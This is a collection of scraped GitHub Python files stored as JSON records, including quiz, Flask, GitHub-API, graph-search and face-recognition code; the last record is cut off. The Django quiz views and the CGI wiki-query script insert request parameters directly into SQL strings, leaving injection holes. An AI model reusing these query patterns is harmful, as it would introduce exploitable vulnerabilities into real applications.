+{"seq_id":"32145388902","text":"# chapter 1 of functional python book\ndef sum(seq):\n if len(seq) == 0:\n return 0\n return seq[0] + sum(seq[1:])\n\nsum([1, 2, 3, 4, 1])\nsum([1])\n\n# recursive\ndef until(n, filter_func, v):\n if v == n:\n return []\n if filter_func(v):\n return [v] + until(n, filter_func, v+1)\n else:\n return until(n, filter_func, v+1)\n\n# now use lambda for one line functions\n\nmult_3_5 = lambda x: x % 3 == 0 or x % 5 == 0 \n\nmult_3_5(3)\nmult_3_5(5)\n\n# combine\nuntil(10, lambda x: x % 3 == 0 or x % 5 == 0, 0)\n\n# nested generator expression\nsum(n for n in range(1, 10) if n % 3 == 0 or n % 5 == 0)\n\n# object creation\n# plus operator is both commutative and associative\n1 + 2 + 3 + 4\n\n# can also be\n# fold values left to right\n# create intermediate values 3 and 6\n((1 + 2) + 3) + 4 \n\n# fold values right to left\n# intermediate objects 7 and 9 are created\n1 + (2 + (3 + 4)) \n\n# slight advantage working left to right\nimport timeit\ntimeit.timeit(\"((([] + [1]) + [2]) + [3]) + [4]\")\ntimeit.timeit(\"[] + ([1] + ([2] + ([3] + [4])))\")\n\n####\n# Important functional design that + has no hidden side effects\n####\n\n# stack of turtles\n# CPUs are generally procedural not functional or OO\n# three main layers of abstraction\n# 1) applications will be functions all the way down until \n# we hit the objects\n# 2) Underlying Python runtime environment that supports functional\n# programming is objects- all the way down- until we hit turtles\n# 3) The libraries that support python are a turtle on which python stands\n# \n# The OS and hardware form thier own stack of turtles\n# Nearing the end.\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"rjcmarkelz/python_the_hard_way","sub_path":"functional_python/chp1_1.py","file_name":"chp1_1.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35041206096","text":"\"\"\"\nCrabs\n\nhttps://adventofcode.com/2021/day/7\n\n\"\"\"\nimport numpy as np\nfrom aoc import parse_numbers\n\n\nCOST = {}\n\ndef get_cost(dist):\n if dist not in COST:\n COST[dist] = sum(range(1, dist + 1))\n return COST[dist]\n\ncost_func2 = np.frompyfunc(get_cost, 1, 1)\n\n\ndef solve(data, cost_func=None):\n crabs = np.array(parse_numbers(data)).reshape(-1, 1)\n targets = np.arange(min(crabs), max(crabs)+1)\n cost = np.abs(crabs - targets)\n if cost_func:\n cost = cost_func(cost)\n return min(cost.sum(axis=0))\n\n\nif __name__ == '__main__':\n input_data = open('input_data.txt').read()\n result = solve(input_data)\n print(f'Example 1: {result}')\n # 340056\n\n result = solve(input_data, cost_func2)\n print(f'Example 2: {result}')\n # 96592275\n","repo_name":"krother/advent_of_code","sub_path":"2021/day_07/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"34028396889","text":"\nfrom django.shortcuts import redirect, render\nfrom django.http import HttpResponse\nfrom django.http import Http404\nfrom django.template import loader,RequestContext\nfrom django.shortcuts import render\nfrom django.views.decorators import csrf\nimport time\nimport os\nimport sqlite3\n# Create your views here.\n\n#带有用户登录,做题,保存记录 \n\ndef getml(wen):\n myml=os.getcwd()+\"\\\\\"+wen\n return(myml)\n\nml=getml(\"en.sqlite3\")\ndef sql_ml(request):\n \n\n return render(request, 'myen/sql_ml.htm')\n\ndef sql_db(mysql):\n conn=sqlite3.connect(ml) #创建指定数据库 硬盘\n sj = conn.cursor()\n sj.execute(mysql)\n zd1=sj.fetchall()\n conn.commit()\n sj.close\n conn.close\n\n return zd1\n\ndef list_all(biaoming):\n zd={}\n tou=[]\n ml=getml(\"en.sqlite3\")\n conn=sqlite3.connect(ml) #创建指定数据库 硬盘\n sj = conn.cursor()\n sj.execute(biaoming)\n zd1=sj.fetchall()\n des = sj.description\n for i in des:\n # print(i)\n tou.append(i[0])\n zd[\"tou\"]=tou\n zd[\"shuju\"]=zd1\n sj.close \n conn.close\n \n return zd\ndef sql_du(mysql):\n zd={}\n tou=[]\n ml=getml(\"en.sqlite3\")\n conn=sqlite3.connect(ml) #创建指定数据库 硬盘\n sj = conn.cursor()\n sj.execute(mysql)\n zd1=sj.fetchall()\n # des = sj.description\n # for i in des:\n # tou.append(i[0])\n # zd[\"tou\"]=tou\n \n zd[\"shuju\"]=zd1\n sj.close \n conn.close\n \n return zd\n\ndef sql_xie(mysql):\n #通用sql语句,无返回值,写入数据库\n zd=\"\"\n ml=getml(\"en.sqlite3\")\n conn=sqlite3.connect(ml) #创建指定数据库 硬盘\n # print(mysql)\n sj = conn.cursor()\n sj.execute(mysql)\n conn.commit()\n\n sj.close \n conn.close\n zd=mysql+\"ok\"\n return zd\n\ndef sj_du(request):\n ctx ={}\n conn=sqlite3.connect(ml) #创建指定数据库 硬盘\n sj = conn.cursor()\n sj.execute(\"select * from danci ORDER BY RANDOM() limit 20\")\n zd1=sj.fetchall()\n des = sj.description\n ctx[\"tou\"]=des\n ctx[\"shuju\"]=zd1\n sj.close \n conn.close\n \n\n return render(request, \"myen/cs_list.htm\", {\"zd_list\":ctx})\n\n\n\n\ndef chuti(lei,xueke):\n zd1=[]\n conn=sqlite3.connect(ml) #创建指定数据库 硬盘\n sj = conn.cursor()\n sj.execute(\"select * from timu where leibie='\"+ lei +\"' and zhangjie ='\"+xueke+\"' ORDER BY RANDOM() limit 1\")\n zd1=sj.fetchall()\n\n return zd1\ndef chuti_id(tm_id):\n zd1=[]\n conn=sqlite3.connect(ml) #创建指定数据库 硬盘\n sj = conn.cursor()\n sj.execute(\"select * from timu where myid=\" + tm_id)\n zd1=sj.fetchall()\n\n return zd1\n\n\n\ndef add_dan1(request):\n return render(request,\"myen/ls_add_dan.html\")\ndef add_dan2(request):\n timu1=[]\n timu2=[]\n zd={}\n jg=\"\"\n if request.POST:\n xueke=request.POST['D1']\n shuru=request.POST['S1']\n zd[\"xk\"]=xueke\n timu=fenge(shuru)\n for i in timu:\n tm_ls=i\n l=len(tm_ls)-1\n tm_ls[l]=str(tm_ls[l]).upper()\n tm_str=\"^\".join(tm_ls)\n \n \n mysql=\"insert into lishi(leixing,timu,xueke) values('单选','{0}','{1}')\".format(tm_str,xueke)\n # print(mysql)\n jg=jg+sql_xie(mysql)+\" \"\n # jg=jg+mysql+\" \"\n return render(request,\"myen/myshow.html\",{\"zd_list\":jg})\n\n\ndef fenge(mystr):\n myok=[]\n gc=[]\n mystr=mystr.replace(',',',')\n mystr=mystr.replace('\\'','’')\n mystr=mystr.replace('\\\"','“')\n \n mystr=mystr.replace('\\r\\n\\r\\n','^')\n gc=mystr.split('^')\n for i in gc:\n mystr1=i\n mystr1=mystr1.replace('\\r\\n','^')\n gc1=mystr1.split('^')\n myok.append(gc1)\n \n \n return myok\n\ndef timu1(request):\n jieguo=[]\n zz2=request.GET.get('user_id')\n zz1=request.GET.get('timu_id')\n zz3=request.GET.get('jl_id')\n if int(zz1)<1 :\n jilu=chuti1(zz2,0)\n # print(\"jilu:\",jilu)\n jieguo=timu_show(jilu[1])\n jieguo.append(zz2)\n jieguo.append(jilu[0])\n else:\n jieguo=timu_show(zz1)\n \n jieguo.append(zz2)\n jieguo.append(zz3)\n \n \n \n return render(request,\"myen/testshow.html\",{\"zd_list\":jieguo}) \n\ndef timu_show(timu_id):\n jieguo=[]\n i=[]\n mysql=\"select * from lishi where myid={0}\".format(timu_id)\n # print(mysql)\n zd=sql_du(mysql)[\"shuju\"]\n if len(zd)>0:\n # print(zd)\n i = zd[0]\n jieguo=i[2].split(\"^\")\n jieguo.insert(0,i[0])\n \n \n return jieguo\n \ndef timu2(request):\n jieguo={}\n tm_ls=[]\n if request.POST:\n zz2=request.GET.get('user_id')\n zz1=request.GET.get('timu_id')\n zz3=request.GET.get('jl_id')\n xueke=request.POST[\"R1\"]\n xuanze=chr(62+int(xueke))\n tm_ls=timu_show(zz1)\n jieguo[\"timu\"]=tm_ls\n jieguo[\"user_id\"]=zz2\n jieguo[\"xuanze\"]=xuanze\n jieguo[\"timu_id\"]=zz1\n jieguo['jilu_id']=zz3\n # print(tm_ls[6])\n if tm_ls[6]==xueke:\n defen=1\n else:\n defen=0\n mysql=\"update jilu set daan='{0}',defen='{2}' where myid={1}\".format(xueke,zz3,defen)\n a=sql_xie(mysql)\n new_tm=chuti1(zz2,0)\n if len(new_tm)==0:\n jieguo[\"jiesu\"]=0\n else:\n jieguo['jiesu']=new_tm[1]\n \n \n return render(request,\"myen/testout.html\",{\"zd_list\":jieguo}) \n \n \ndef userload(request):\n \n \n return render(request,\"myen/index.html\",{\"zd_list\":\"请选择班级和姓名\"})\n \ndef userload2(request):\n jieguo={}\n tm_ls=[]\n if request.POST:\n banji=request.POST[\"D1\"]\n xingming=request.POST[\"T1\"]\n if xingming==\"\":\n chu=\"姓名必须输入\"\n return render(request,\"myen/index.html\",{\"zd_list\":chu})\n t0=time.time()\n mysql=\"select * from denglu where banji='{0}' and xingming='{1}' order by myid desc\".format(banji,xingming)\n user_id=sql_du(mysql)[\"shuju\"]\n \n if len(user_id)>0:\n load_id=user_id[0][0]\n mysql=\"update denglu set shijian='{0}',jiesu='0' where myid={1} \".format(t0,load_id)\n # chu=mysql\n a=sql_xie(mysql)\n a=shaixun(load_id,40)\n jieguo[\"timu\"]=timuall(load_id)\n jieguo[\"u_id\"]=load_id\n # tm_ls=chuti1(load_id,0)\n \n # jieguo=timu_show(tm_ls[1])\n # jieguo.append(load_id)\n # jieguo.append(tm_ls[0])\n # chu=jieguo\n \n \n else:\n \n mysql=\"insert into denglu(banji,xingming,shijian,jiesu) values('{0}','{1}','{2}','{3}')\".format(banji,xingming,t0,'0')\n # chu=mysql\n chu=sql_xie(mysql)\n mysql=\"select * from denglu where banji='{0}' and xingming='{1}' order by myid desc\".format(banji,xingming)\n user_id=sql_du(mysql)[\"shuju\"]\n chu1=user_id[0][0]\n chu=shaixun(chu1,40)\n # tm_ls=chuti1(load_id,0)\n # jieguo=timu_show(tm_ls[1])\n # jieguo.append(load_id)\n # jieguo.append(tm_ls[0])\n jieguo[\"timu\"]=timuall(chu1)\n jieguo[\"u_id\"]=(chu1)\n \n \n\n return render(request,\"myen/testshowall.html\",{\"zd_list\":jieguo})\n\ndef shaixun(user_id,shu):\n mysql=\"delete from jilu where user_id={0}\".format(user_id)\n tm_str=sql_xie(mysql)\n tm_list=sql_du(mysql)[\"shuju\"]\n mysql=\"select myid from lishi ORDER BY RANDOM() limit {0}\".format(shu)\n \n tm_list=sql_du(mysql)[\"shuju\"]\n n=1\n for i in tm_list:\n \n mysql=\"insert into jilu(user_id,timu,jielun) values('{0}','{1}','{2}')\".format(user_id,i[0],n)\n # print(mysql)\n sql_xie(mysql)\n n=n+1\n jieguo=\"ok\"\n \n \n return jieguo\n\n# def chuti1(user_id,tm_id):\n# jieguo=[]\n# if tm_id==0:\n# mysql=\"select myid,timu from jilu where user_id='{0}' and daan= '^'\".format(user_id)\n# # print(mysql)\n# timu=sql_du(mysql)[\"shuju\"]\n# # print(\"timu:\",timu[0])\n \n# # timu=timu\n# # print(timu[0])\n \n# else:\n# # mysql=\"select myid,timu from jilu where user_id='{0}' and daan= '^'\".format(user_id)\n# # timu=sql_du(mysql)[\"shuju\"]\n# # print(\"timu:\",timu[0])\n \n# # timu=timu\n# # print(timu[0])\n# jieguo=timu[0]\n# return jieguo\n\ndef timushowall(request):\n chu={}\n chu[\"timu\"]=timuall(18)\n \n return render(request,\"myen/testshowall.html\",{\"zd_list\":chu})\n\ndef timuall(user_id):\n jieguo=[]\n mysql=\"select * from jilu where user_id={0}\".format(user_id)\n timu30=sql_du(mysql)[\"shuju\"]\n for i in timu30:\n jieguo.append(timu_dan(i[0],i[2]))\n # jieguo.append(timu30)\n # print(jieguo)\n return jieguo\n\ndef timu_dan(myid,timu_id):\n #返回list\n jieguo=[]\n mysql=\"select * from lishi where myid={0}\".format(timu_id)\n tm=sql_du(mysql)[\"shuju\"][0]\n tm_ls=tm[2].split(\"^\")\n # print(tm[2])\n # jieguo.append(tm_ls)\n jieguo.append(tm_ls[0]+\"\")\n a=\"\"\n for i in range(1,len(tm_ls)-1):\n if tm_ls[-1]==chr(i+64):\n a=a+\" {2} \".format(chr(64+i),myid,tm_ls[i])\n else:\n a=a+\" {2} \".format(chr(64+i),myid,tm_ls[i])\n \n \n a=a+\" \"\n jieguo.append(a)\n \n return jieguo\n\ndef timujieguo(request):\n jieguo={}\n daan=[]\n u_id=request.GET.get(\"u_id\")\n jieguo[\"u_id\"]=u_id\n mysql=\"select * from denglu where myid={0}\".format(u_id)\n hui=sql_du(mysql)[\"shuju\"]\n \n banji=request.POST\n # print(hui)\n jieguo[\"bj\"]=hui[0][1]\n jieguo[\"xm\"]=hui[0][2]\n jieguo[\"shi\"]=int(time.time())-int(eval(hui[0][3]))\n mysql=\"update denglu set jiesu='{1}' where myid={0}\".format(u_id,time.time())\n # print(mysql)\n jg=sql_xie(mysql)\n \n print(banji)\n # chu=banji[\"R1\"]\n defen=0\n for m,n in banji.items() :\n \n if len(n)==3 :\n defen=defen+1\n mysql=\"update jilu set daan='{0}' , defen={1} where myid={2}\".format(n[0],1,m)\n a=sql_xie(mysql)\n \n if len(n)==1:\n mysql=\"update jilu set daan='{0}' , defen={1} where myid={2}\".format(n,0,m)\n # print(m,n)\n # print(mysql)\n a=sql_xie(mysql)\n jieguo[\"fen\"]=defen\n \n \n \n \n return render(request,\"myen/testshowall3.html\",{\"zd_list\":jieguo})\n\ndef jieguolist(request):\n chu={}\n u_id=request.GET.get(\"u_id\")\n chu[\"timu\"]=timuchakan(u_id)\n \n return render(request,\"myen/testshowall2.html\",{\"zd_list\":chu})\n\ndef timuchakan(user_id):\n jieguo=[]\n daan=[]\n mysql=\"select * from jilu where user_id={0}\".format(user_id)\n hui=sql_du(mysql)[\"shuju\"]\n # print(mysql)\n for i in hui:\n # print(i[2],i[3])\n a=timu_dan2(i[3],i[2])\n jieguo.append(a)\n \n \n \n \n # jieguo=hui\n return jieguo\n\n\ndef timu_dan2(my_da,timu_id):\n #返回list\n jieguo=[]\n mysql=\"select * from lishi where myid={0}\".format(timu_id)\n tm=sql_du(mysql)[\"shuju\"][0]\n tm_ls=tm[2].split(\"^\")\n # print(tm[2])\n # jieguo.append(tm_ls)\n jieguo.append(tm_ls[0]+\"\")\n a=\"\"\n for i in range(1,len(tm_ls)-1):\n a=a+\"{0} \".format(tm_ls[i])\n \n a=a+\"正确答案:{0}\".format(tm_ls[-1])\n if my_da==\"^\":\n my_da=\"无\"\n a=a+\" 你的答案:{0}\".format(my_da)\n \n a=a+\" \"\n jieguo.append(a)\n \n return jieguo\n\ndef tongji(request):\n chu=[]\n \n mysql=\"select * from denglu order by banji,xingming\"\n jg=sql_du(mysql)[\"shuju\"]\n # chu[\"timu\"]=jg\n for i in jg:\n a=[]\n mysql=\"select sum(defen) from jilu where user_id={0}\".format(i[0])\n jg=sql_du(mysql)[\"shuju\"]\n a.append(i[1])\n a.append(i[2])\n \n # a[3]=int(eval(i[4])-eval(i[3]))\n a.append(jg[0][0])\n a.append(int(eval(i[4])-eval(i[3])))\n b=time.localtime(eval(i[3]))\n a.append(time.strftime(\"%Y-%m-%d %H:%M:%S\", b))\n chu.append(a)\n \n # print(a)\n \n return render(request,\"myen/tongji.html\",{\"zd_list\":chu})\n \n\n\n \n \n \n\n\n","repo_name":"boluohuixz3/djen","sub_path":"myen/myls.py","file_name":"myls.py","file_ext":"py","file_size_in_byte":12330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"2552661241","text":"# from dicetables_db import RequestHandler, SQLConnection, MongoDBConnection\nimport os\n\nfrom flask import Flask, jsonify, render_template, request\n\nfrom flaskapp.dice_tables_tequest_handler import DiceTablesRequestHandler\n\napp = Flask(__name__)\n\n\n@app.route('/_get_table')\ndef add_numbers():\n reqeust_str = request.args.get('requestStr', '', type=str)\n # handler = RequestHandler(MongoDBConnection('test_app', 'test'))\n # handler = RequestHandler(SQLConnection(':memory:', 'test'))\n handler = DiceTablesRequestHandler(max_dice_value=6000)\n table_obj = handler.get_response(reqeust_str)\n # handler.close_connection()\n if 'error' in table_obj:\n return jsonify(table_obj), 400\n return jsonify(table_obj), 200\n\n\n@app.route('/')\ndef index():\n directory = os.path.dirname(__file__)\n instructions_path = os.path.join(directory, 'static', 'instructions.txt')\n with open(instructions_path, 'r') as f:\n instructions_text = f.read()\n\n intro_path = os.path.join(directory, 'static', 'intro.txt')\n with open(intro_path, 'r') as f:\n intro_text = f.read()\n return render_template('index.html', intro_text=intro_text, instruction_text=instructions_text)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"eric-s-s/dicetables_flask","sub_path":"flaskapp/myapp.py","file_name":"myapp.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39291938800","text":"from github import Github\n\nfrom config import get_github_access_token\n\nREPO_NAME = 'HerokuFiles'\n\n\ngithub = Github(get_github_access_token())\n\n\ndef get_repos():\n for repo in github.get_user().get_repos():\n print(repo.name)\n\n\ndef get_file(filename):\n repository = github.get_user().get_repo(REPO_NAME)\n file = repository.get_contents(filename)\n\n print(file.url)\n\n return file\n\n\ndef check_file_exist(filename):\n try:\n file = get_file(filename)\n except:\n return False\n\n return True\n\n\ndef put_file(filename, content):\n\n repository = github.get_user().get_repo(REPO_NAME)\n\n if check_file_exist(filename):\n print(f'update_file {filename}')\n f = get_file(filename)\n f = repository.update_file(filename, \"update_file via PyGithub\", content, f.sha)\n else:\n print(f'create_file {filename}')\n f = repository.create_file(filename, \"create_file via PyGithub\", content)\n\n\ndef get_user(name):\n user = github.get_user(name)\n\n return user\n\n","repo_name":"gcatanese/HerokuFiles","sub_path":"app/github_api.py","file_name":"github_api.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"70"}
+{"seq_id":"1296199905","text":"from aiogram.types import ReplyKeyboardMarkup, KeyboardButton\n\n\nasync def works_optional():\n menu = ReplyKeyboardMarkup(resize_keyboard=True)\n works = KeyboardButton('💰 Работать')\n fishing = KeyboardButton('🎣 Рыбалка')\n collect_bottle = KeyboardButton('🍾 Собирать бутылки')\n sell_bottle = KeyboardButton('💱🍾 Обмен бутылок')\n business = KeyboardButton('🤵♂️ Бизнес')\n profile = KeyboardButton('👤 Профиль')\n menu.row(works)\n menu.row(fishing)\n menu.row(collect_bottle, sell_bottle)\n menu.row(business)\n menu.row(profile)\n return menu","repo_name":"Papirus101/bomj_old","sub_path":"keyboards/reply/works_keyboard.py","file_name":"works_keyboard.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"5509286043","text":"__author__ = 'Mj'\n\n\ndef BFS(graph, source):\n k = 0\n visited.append(source)\n level.setdefault(str(k), []).append(source)\n enqueue = [source]\n while enqueue:\n k += 1\n for node in graph.get(enqueue[0], []):\n if node not in graph and node not in visited:\n enqueue.append(node)\n level.setdefault(str(k), []).append(node)\n parent['Node ' + str(node)] = enqueue[0]\n visited.append(node)\n break\n if node not in visited:\n enqueue.append(node)\n level.setdefault(str(k), []).append(node)\n parent['Node ' + str(node)] = enqueue[0]\n visited.append(node)\n enqueue.pop(0)\n\n\nGraph = {}\nvisited = []\nlevel = {}\nparent = {}\nnumEdges = int(input().strip()) #all number of edges.\nfor i in range(numEdges):\n n1, n2 = list(map(int, input().strip().split())) #input all edges a -> b.\n Graph.setdefault(n1, []).append(n2)\nso = int(input(\"Enter source: \"))\nparent['Node ' + str(so)] = None\nBFS(Graph, so)\nprint(level)\nprint(parent)\nprint(visited)\n\n\n\n","repo_name":"manoj2509/Python-Practice","sub_path":"CLRS/2. BFS.py","file_name":"2. BFS.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"34252743040","text":"import sys\nfrom time import time\nimport timeit\nfrom datetime import datetime\nfrom scipy import stats, sparse\nfrom scipy.sparse.linalg import svds, eigs\nfrom scipy.special import expit\nimport numpy as np\nimport os\nimport pandas as pd\nfrom scipy.special import softmax\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.preprocessing import normalize\nfrom sklearn.manifold import TSNE\nfrom sklearn import metrics\nfrom collections import Counter\nfrom sklearn.preprocessing import normalize\nfrom scipy.stats import norm as dist_model\nfrom sklearn import preprocessing\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.cross_decomposition import CCA\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom scipy import spatial\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom utils import *\nsys.path.append(REPO_DIR)\nos.chdir(REPO_DIR)\nfrom plots import *\n\n\n\nif len(sys.argv) <= 2:\n\tpid = 0\n\ttotal_pid = 1\nelse:\n\tpid = int(sys.argv[1])\n\ttotal_pid = int(sys.argv[2])\n\nfig_dir = OUTPUT_DIR + '/Figures/CrossDataset/'\nif not os.path.exists(fig_dir):\n\tos.makedirs(fig_dir)\noutput_dir = OUTPUT_DIR + '/Crossdatasets/'\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\nontology_dir = OUTPUT_DIR+'/Ontology/CellOntology/'\n\nnn_nhidden = [100,50,25]\nkeep_prob = 0.7\nunseen_ratio = 0.5\nmetrics = ['AUROC(seen)','AUPRC(seen)','AUROC','AUPRC','AUROC(unseen)', 'AUPRC(unseen)','Accuracy@3','Accuracy@5']\nresult_file = output_dir + 'auprc.result.txt'\nif not os.path.isfile(result_file):\n\tfout = open(result_file,'w')\n\tpct = -1\n\tfor dname1 in dnames:\n\t\tfor dname2 in dnames:\n\t\t\tif dname1 == dname2:\n\t\t\t\tcontinue\n\t\t\tpct += 1\n\t\t\tif total_pid>1 and pct%total_pid != pid:\n\t\t\t\tcontinue\n\n\t\t\tfeature1, label1, genes1, ontology_nlp_file, ontology_file = read_singlecell_data(dname1, DATA_DIR,nsample=50000000)\n\t\t\tprint (np.unique(label1))\n\n\t\t\tco_dim = 5\n\t\t\tontology_emb_file = ontology_dir + str(co_dim)\n\t\t\tunseen_l, l2i, i2l, onto_net, Y_emb, cls2cls = ParseCLOnto(label1, co_dim = co_dim, use_pretrain = ontology_emb_file, ontology_nlp_file = ontology_nlp_file, ontology_file = ontology_file)\n\t\t\tncls = np.shape(cls2cls)[0]\n\t\t\tlabel1 = MapLabel2CL(label1, l2i)\n\t\t\tunseen_l = MapLabel2CL(unseen_l, l2i)\n\t\t\tnunseen = len(unseen_l)\n\t\t\tnseen = ncls - nunseen\n\n\t\t\tfeature2, label2, genes2, ontology_nlp_file, ontology_file = read_singlecell_data(dname2, DATA_DIR,nsample=50000000)\n\t\t\tprint (np.unique(label2))\n\t\t\tlabel2 = MapLabel2CL(label2, l2i)\n\t\t\tprint (set(label1) - set(label2))\n\t\t\tprint (len(set(label1) - set(label2)), len(set(label2) - set(label1)))\n\n\n\t\t\tcommon_genes = np.array(list(set(genes1) & set(genes2)))\n\t\t\ttrain_Y = label1\n\t\t\ttest_Y = label2\n\t\t\ttest_Y_ind = np.sort(np.array(list(set(test_Y) | set(train_Y))))\n\t\t\tprint ('ngenes:%d. seen: %d, ntrainY: %d, ntestY: %d, unseen: %d' % (len(common_genes), nseen, len(np.unique(train_Y)), len(np.unique(test_Y)), len(set(test_Y) - set(train_Y))))\n\t\t\tpred_Y_all = np.load(output_dir+dname1+'.'+dname2+'pred_Y_all.npy')\n\t\t\tres = evaluate(pred_Y_all, test_Y, unseen_l, nseen, metrics = metrics\n\t\t\t, Y_ind = test_Y_ind, write_to_file = fout, Y_net = onto_net, write_screen = True, prefix = dname1+'.'+dname2+'.'+str(len(set(test_Y) - set(train_Y)))+'.'+str(len(set(test_Y))))\n\tfout.close()\n\nndame = len(dnames)\nmat2i = {}\nfor metric in metrics:\n\tmat2i[metric] = np.empty((ndame, ndame))\n\tmat2i[metric][:] = np.NaN\nmat2i['Ratio of unseen cell types'] = np.empty((ndame, ndame))\nmat2i['Ratio of unseen cell types'][:] = np.NaN\ndname2i = {}\ni2dname = {}\nfor i in range(ndame):\n\tdname2i[dnames[i]] = i\n\ti2dname[i] = dnames[i]\nprint (dname2i)\nfin = open(result_file)\nfor line in fin:\n\tw = line.strip().split('\\t')\n\td1,d2,nunseen,ntest = w[0].split('.')\n\tnunseen_ratio = int(nunseen) * 1. / int(ntest)\n\td1i = dname2i[d1]\n\td2i = dname2i[d2]\n\tmat2i['Ratio of unseen cell types'][d1i,d2i] = nunseen_ratio\n\tfor i, metric in enumerate(metrics):\n\t\tmat2i[metric][d1i,d2i] = float(w[i+1])\n\nmethods = []\nfor dname in dnames:\n\tmethods.append(dname2keyword[dname])\nmetrics = list(mat2i.keys())\nmetrics.reverse()\nfor metric in metrics:\n\theat_mat = mat2i[metric]\n\tprint (fig_dir + metric + '.pdf')\n\tplot_heatmap_cross_dataset(heat_mat, methods=methods, file_name =fig_dir + metric.replace('\\n',' ') + '_resize0.pdf', title=metric, ylabel=metric)\n","repo_name":"intyawlrs/OnClass","sub_path":"reproduce/OnClass_reproduce/plot/PlotCrossDataset.py","file_name":"PlotCrossDataset.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"70"}
+{"seq_id":"18385508967","text":"import cv2\nimport os\nimport numpy as np\n\nnamelabels = [\"bill gates\", \"mark zuckerberg\"]\n\n#Code to detect face using harr cascade algorithm\nhaarCascadeDetector = cv2.CascadeClassifier(\"./cascades/haarcascade_frontalface_default.xml\")\ndef detectFace(img):\n faces = haarCascadeDetector.detectMultiScale(img, scaleFactor=1.1, minNeighbors=7, minSize=(40, 40),\n flags=cv2.CASCADE_SCALE_IMAGE)\n return faces\n\n\n#Step1: prepare training data\ndef prepareTrainingData(folderPath):\n\n faces = []\n labels = []\n\n #Read each directory\n for directoryName in os.listdir(folderPath):\n\n if directoryName.startswith(\".\"):\n continue\n\n #Read each image\n for imageName in os.listdir(folderPath + \"/\" + directoryName):\n\n if imageName.startswith(\".\"):\n continue\n\n #read each image\n imagePath = folderPath + \"/\" + directoryName + \"/\" + imageName\n image = cv2.imread(imagePath)\n\n #convert to gray scale\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n #detect faces\n detectedFaces = detectFace(gray)\n\n #store face and lables in an array\n for (x, y, w, h) in detectedFaces:\n faces.append(gray[y:y + w, x:x + h])\n labels.append(namelabels.index(directoryName))\n\n return faces, labels\n\n\nfaces, labels = prepareTrainingData(\"./trainingImages\")\nprint(\"Total faces: \", len(faces))\nprint(\"Total labels: \", len(labels))\n\n#Step2: create face recognizer and train the model\nfaceRecognizer = cv2.face.LBPHFaceRecognizer_create()\nfaceRecognizer.train(faces, np.array(labels))\n\n#step3: test the model by running test images and predict\ndef predictImage(img):\n\n # convert to gray scale\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n #detect faces\n detectedFaces = detectFace(gray)\n\n for (x, y, w, h) in detectedFaces:\n\n #draw rectangle on each face\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n #face model recognizer predicts the test image and returns the label\n label, confidence = faceRecognizer.predict(gray[y:y + w, x:x + h])\n\n #label is a number so get the associated name\n label_text = namelabels[label]\n\n #write name on the image\n cv2.putText(img, label_text, (x, y), cv2.FONT_HERSHEY_PLAIN, 1.1, (0, 255, 0), 2)\n\n #Show the image\n cv2.imshow(\"Predicted Image\", img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ntestImage1 = cv2.imread(\"./testingImages/test1.jpeg\")\npredictImage(testImage1)\n\ntestImage2 = cv2.imread(\"./testingImages/test2.jpeg\")\npredictImage(testImage2)\n","repo_name":"gsopu8065/mlcrunchProjects","sub_path":"face/eigen_face.py","file_name":"eigen_face.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39179031433","text":"#!/usr/bin/env python3\n\nimport os\nimport cgi\nimport sys\nfrom wmflabs import db\nimport yaml\n\n#Print header\nprint('Content-type: text/html\\n')\n\n# Fetch params\nlabs = False\nif 'QUERY_STRING' in os.environ:\n\tQS = os.environ['QUERY_STRING']\n\tqs = cgi.parse_qs(QS)\n\ttry:\n\t\tusername = qs['user'][0].replace('_', ' ')\n\texcept:\n\t\tprint('nouser')\n\t\tsys.exit(0)\n\tif 'labs' in qs:\n\t\tlabs = True\n\t\timport pymysql\n\t\t# Load config\n\t\t__dir__ = os.path.dirname(__file__)\n\t\tconfig = yaml.safe_load(open(os.path.join(__dir__, 'config.yaml')))\n\t\tconn = pymysql.connect(db=qs['labs'][0],\n\t\t\thost=config['DB_HOST'],\n\t\t\tuser=config['DB_USER'],\n\t\t\tpassword=config['DB_PASS'],\n\t\t\tcharset=\"utf8\",\n\t\t)\n\telse:\n\t\ttry:\n\t\t\tconn = db.connect(qs['db'][0])\n\t\texcept:\n\t\t\tconn = db.connect('commonswiki')\nelse:\n\tprint('nouser')\n\tsys.exit(0)\n\n##### PROGRAM ####\n\ncur = conn.cursor()\nwith cur:\n\tsql = 'select count(*) from logging_userindex where log_type=\"upload\" and log_actor=(select actor_id from actor where actor_name=\"' + username + '\");'\n\tif labs:\n\t\tsql = sql.replace('_userindex', '')\n\tcur.execute(sql)\n\tdata = cur.fetchall()\n\nresult = 